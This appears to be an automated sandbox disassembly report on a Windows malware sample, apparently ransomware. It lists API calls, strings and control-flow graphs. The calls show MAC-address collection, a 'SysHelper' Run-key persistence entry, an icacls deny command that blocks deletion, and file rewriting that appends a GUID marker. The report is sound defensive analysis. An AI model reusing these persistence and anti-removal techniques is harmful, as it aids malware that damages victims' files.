                                                                                                                                                                        • Instruction ID: f158fcb250b9d22b5f4439e3a54ee11fcfcc6cd4c830a4b13528f26d9049202b
                                                                                                                                                                        • Opcode Fuzzy Hash: 68603a39e96f6117c9ed2a11793131f800697274207b9a34facb43b8febd3f6e
                                                                                                                                                                        • Instruction Fuzzy Hash: 00422971518345AFDB22EF24CC49BABBBE8BF45344F00092CF58597292DB74D618CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 002F1010
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F1026
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 002F103B
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F1051
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 002F1059
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 002F1064
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F107A
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 002F1099
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F10AB
                                                                                                                                                                        • _memset.LIBCMT ref: 002F10CA
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 002F10DE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002F10F0
                                                                                                                                                                        • _malloc.LIBCMT ref: 002F1100
                                                                                                                                                                        • _memset.LIBCMT ref: 002F110B
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002F112E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 002F113C
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 002F1154
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 002F115F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                                                        • Opcode ID: c519f9ec4fb252162e41ea88cdcd3db50dc8a6d559aeddf0932f5f218d36d17e
                                                                                                                                                                        • Instruction ID: a2c1ed5f9408b5169edf07fe98b3a97be63de7fae6d9312e197e5f1687e4d655
                                                                                                                                                                        • Opcode Fuzzy Hash: c519f9ec4fb252162e41ea88cdcd3db50dc8a6d559aeddf0932f5f218d36d17e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9151AD71D40219EBDB12DFA5DC46FEFBBB8EF04744F100125FA04B6180EB759A508BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002F1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1ACA
                                                                                                                                                                          • Part of subcall function 002F1AB0: DispatchMessageW.USER32(?), ref: 002F1AE0
                                                                                                                                                                          • Part of subcall function 002F1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 002EF900
                                                                                                                                                                        • _memmove.LIBCMT ref: 002EF9EA
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 002EFA51
                                                                                                                                                                        • _memmove.LIBCMT ref: 002EFADA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        • Opcode ID: f77d86e82010e588bb72b8cc614fa8c450b624f3a3c1fbc535f1959e9ad07d0a
                                                                                                                                                                        • Instruction ID: 1059345f8e68b37cfdb39c4e3379ace9ad5dd83e68be9c6f50ec956ae40cc44a
                                                                                                                                                                        • Opcode Fuzzy Hash: f77d86e82010e588bb72b8cc614fa8c450b624f3a3c1fbc535f1959e9ad07d0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 2152CE71D20249DBCF10DFA8C995BEEB7B4BF05304F604179E409AB281E771AA58CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 1515 2ee870-2ee8d6 call 2f56d0 CryptAcquireContextW 1518 2ee8d8-2ee8e4 call 310eca 1515->1518 1519 2ee8e9-2ee901 CryptCreateHash 1515->1519 1518->1519 1521 2ee914-2ee930 CryptHashData 1519->1521 1522 2ee903-2ee90f call 310eca 1519->1522 1523 2ee932-2ee93e call 310eca 1521->1523 1524 2ee943-2ee961 CryptGetHashParam 1521->1524 1522->1521 1523->1524 1527 2ee974-2ee9a6 call 300be4 call 30b420 CryptGetHashParam 1524->1527 1528 2ee963-2ee96f call 310eca 1524->1528 1534 2ee9a8-2ee9b4 call 310eca 1527->1534 1535 2ee9b9-2ee9bb 1527->1535 1528->1527 1534->1535 1537 2ee9c0-2ee9c3 1535->1537 1538 2ee9c5-2ee9df call 3004a6 1537->1538 1539 2eea10-2eea31 call 302110 CryptDestroyHash CryptReleaseContext 1537->1539 1544 2ee9f2-2ee9f5 1538->1544 1545 2ee9e1-2ee9f0 call 2f3ea0 1538->1545 1546 2eea3e-2eea50 1539->1546 1547 2eea33-2eea3b call 302587 1539->1547 1549 2ee9f8-2ee9fd 1544->1549 1545->1537 1547->1546 1549->1549 1552 2ee9ff-2eea0e call 2f3ea0 1549->1552 1552->1537
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,003DFCA4,00000000,00000000), ref: 002EE8CE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE8E4
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 002EE8F9
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE90F
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 002EE928
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE93E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 002EE95D
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE96F
                                                                                                                                                                        • _memset.LIBCMT ref: 002EE98E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 002EE9A2
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EE9B4
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002EE9D3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                        • Opcode ID: fd220986f98234d7f12ee75b77cceba2f08aabbdb01e09fade5d591ff0b54c9e
                                                                                                                                                                        • Instruction ID: c40fe213a06a739e0ff5a0245035757ee9568c34b6e08f2ca88e91fb7ea21c70
                                                                                                                                                                        • Opcode Fuzzy Hash: fd220986f98234d7f12ee75b77cceba2f08aabbdb01e09fade5d591ff0b54c9e
                                                                                                                                                                        • Instruction Fuzzy Hash: 1151AE71D50249EADF16DFA5CC46FEEBBB8EF04704F100129FA01B61C1D7B5AA148BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 1556 2eeaa0-2eeb09 call 2f56d0 CryptAcquireContextW 1559 2eeb1c-2eeb34 CryptCreateHash 1556->1559 1560 2eeb0b-2eeb17 call 310eca 1556->1560 1562 2eeb36-2eeb42 call 310eca 1559->1562 1563 2eeb47-2eeb56 CryptHashData 1559->1563 1560->1559 1562->1563 1565 2eeb58-2eeb64 call 310eca 1563->1565 1566 2eeb69-2eeb87 CryptGetHashParam 1563->1566 1565->1566 1568 2eeb9a-2eebcc call 300be4 call 30b420 CryptGetHashParam 1566->1568 1569 2eeb89-2eeb95 call 310eca 1566->1569 1575 2eebce-2eebda call 310eca 1568->1575 1576 2eebdf 1568->1576 1569->1568 1575->1576 1578 2eebe1-2eebe4 1576->1578 1579 2eec38-2eec67 call 302110 CryptDestroyHash CryptReleaseContext 1578->1579 1580 2eebe6-2eec00 call 3004a6 1578->1580 1585 2eec02-2eec11 call 2f3ea0 1580->1585 1586 2eec13-2eec19 1580->1586 1585->1578 1588 2eec20-2eec25 1586->1588 1588->1588 1590 2eec27-2eec36 call 2f3ea0 1588->1590 1590->1578
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,003DFCA4,00000000,00000000,00000000,?), ref: 002EEB01
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB17
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 002EEB2C
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB42
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 002EEB4E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB64
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 002EEB83
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEB95
                                                                                                                                                                        • _memset.LIBCMT ref: 002EEBB4
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 002EEBC8
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 002EEBDA
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002EEBF4
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 002EEC44
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 002EEC4F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                        • Opcode ID: b2c83c291d3dc09cc3ceba21c8add615097b344ec2878f0218f7f73c34b6c45d
                                                                                                                                                                        • Instruction ID: 4c0fa48c7c700a6e8285f9602d190f724239fbefe0729bbed5214c137810e7de
                                                                                                                                                                        • Opcode Fuzzy Hash: b2c83c291d3dc09cc3ceba21c8add615097b344ec2878f0218f7f73c34b6c45d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E517171E40249AADF16DFA5CD46FEEBBB8EF19704F200129F905B61C0DB75AA058B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 1593 2ee670-2ee697 call 300c62 * 2 1598 2ee699-2ee6b3 call 301f2d call 300bed 1593->1598 1599 2ee6b4-2ee6c2 GetAdaptersInfo 1593->1599 1601 2ee6db-2ee6e8 GetAdaptersInfo 1599->1601 1602 2ee6c4-2ee6d9 call 300bed call 300c62 1599->1602 1603 2ee6ea-2ee73c call 3004a6 call 301f2d * 2 1601->1603 1604 2ee744-2ee754 call 300bed 1601->1604 1602->1598 1602->1601 1619 2ee741 1603->1619 1619->1604
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EE67F
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EE68B
                                                                                                                                                                        • _wprintf.LIBCMT ref: 002EE69E
                                                                                                                                                                        • _free.LIBCMT ref: 002EE6A4
                                                                                                                                                                          • Part of subcall function 00300BED: HeapFree.KERNEL32(00000000,00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000), ref: 00300C01
                                                                                                                                                                          • Part of subcall function 00300BED: GetLastError.KERNEL32(00000000,?,0030507F,00000000,0030500D,?,00303F7C,?,002FE6CC,00000000,?,?,?,?,?,003AB3EC), ref: 00300C13
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 002EE6B9
                                                                                                                                                                        • _free.LIBCMT ref: 002EE6C5
                                                                                                                                                                        • _malloc.LIBCMT ref: 002EE6CD
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 002EE6E0
                                                                                                                                                                        • _sprintf.LIBCMT ref: 002EE720
                                                                                                                                                                        • _wprintf.LIBCMT ref: 002EE732
                                                                                                                                                                        • _wprintf.LIBCMT ref: 002EE73C
                                                                                                                                                                        • _free.LIBCMT ref: 002EE745
                                                                                                                                                                        Strings
                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 002EE72D
                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 002EE71A
                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 002EE699
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                        • Opcode ID: 1c433130e63df8bf75dc69aa8467b6b8b9674760359260cb28d196c41532a65f
                                                                                                                                                                        • Instruction ID: 20311ac2c8014d08905da948b8fda50f444d2f6486995880aa2c7fc22958c0d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c433130e63df8bf75dc69aa8467b6b8b9674760359260cb28d196c41532a65f
                                                                                                                                                                        • Instruction Fuzzy Hash: DC1159B29025A47AD673A3F65C22FFF77DC8F46702F040265FE88D91C1E6589A0053B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                        • Opcode ID: 8fae3e25cfb856c57c900618715fe96ee85bd30ea06260637e4ddf9de084e763
                                                                                                                                                                        • Instruction ID: 705f98a26d576eb4f8175fb5b2f7755071f2613539334876c97326895091034a
                                                                                                                                                                        • Opcode Fuzzy Hash: 8fae3e25cfb856c57c900618715fe96ee85bd30ea06260637e4ddf9de084e763
                                                                                                                                                                        • Instruction Fuzzy Hash: 1EB1AB70D20249CADF21DFA4CD45BEEBBB9BF15308F604079E409AB291EB719A64CF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D12
                                                                                                                                                                        • _memset.LIBCMT ref: 002F1D3B
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 002F1D63
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D6C
                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 002F1DD6
                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 002F1E48
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 002F1E99
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 002F1EA5
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 002F1EB4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 002F1EBF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002F1ECE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 002F1EDB
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 002F1EFC
                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 002F1F14
                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 002F1F64
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 002F1F83
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002F1F8E
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 002F202D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 002F2036
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 002F204C
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 002F206E
                                                                                                                                                                        • _memset.LIBCMT ref: 002F2090
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,003E02FC), ref: 002F20AA
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 002F20C0
                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 002F20CE
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 002F20D7
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 002F20F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002F20FC
                                                                                                                                                                        • _memset.LIBCMT ref: 002F2120
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 002F2146
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 002F2158
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 002F216D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                        • Opcode ID: b5988efe0c9b426779ca0dfd121c27b6627b6585bd0bfd49be360410a7a1e259
                                                                                                                                                                        • Instruction ID: b3701feeb6132e6ae66b98f732eb9fa7ea9d2a3cf3fc21046ddfbf406c0c9bb4
                                                                                                                                                                        • Opcode Fuzzy Hash: b5988efe0c9b426779ca0dfd121c27b6627b6585bd0bfd49be360410a7a1e259
                                                                                                                                                                        • Instruction Fuzzy Hash: 25E17E71D1021EEBDF25DFA0CD49BEEB7BCAF04304F104169E606A6191EB74AA94CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 002F120F
                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 002F1228
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F123D
                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 002F1277
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 002F12B1
                                                                                                                                                                        • _memset.LIBCMT ref: 002F12C8
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 002F1301
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 002F1314
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F131B
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 002F1349
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 002F1381
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F1388
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 002F13E6
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 002F1409
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 002F1417
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 002F141E
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 002F1471
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 002F1491
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 002F14CF
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 002F159D
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 002F15D0
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 002F15F8
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 002F1649
                                                                                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F166B
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F1678
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 002F168D
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 002F16D6
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F16EB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                        • API String ID: 254274740-1186676987
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 002F2235
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 002F2240
